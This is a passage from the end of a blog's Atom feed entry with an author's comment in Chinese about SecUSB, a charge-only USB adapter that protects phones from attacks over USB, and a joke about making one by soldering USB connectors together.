alt=""></p><hr><!--虽然知道原理,但并没什么鸟用,我手上根本就没有,说年初京东上有卖,一直到现在都没看见哪有,又不好意思死皮赖脸的去找人家要(笑)。当然自己也可以做一个,拿一个USB公头和母头元件焊在一起,外面用塑料壳包上,当然外观肯定没SecUSB好看了。第一次知道SecUSB的时候,还是360研发出来的,用作安全充电的防止黑客通过USB侵入手机的,还以为是什么高大上的黑科技(笑)。我这么把原理写出来,要是被黑商发现了,拿去批量生产,会不会被360打(笑)。-->]]></content>
<summary type="html">
<p><img src="//files.iternull.com/images/2015-09-28_01-0001.png" alt=""><br>
</summary>
<category term="SecUSB" scheme="https://blog.iternull.com/tags/SecUSB/"/>
<category term="USB" scheme="https://blog.iternull.com/tags/USB/"/>
</entry>
</feed>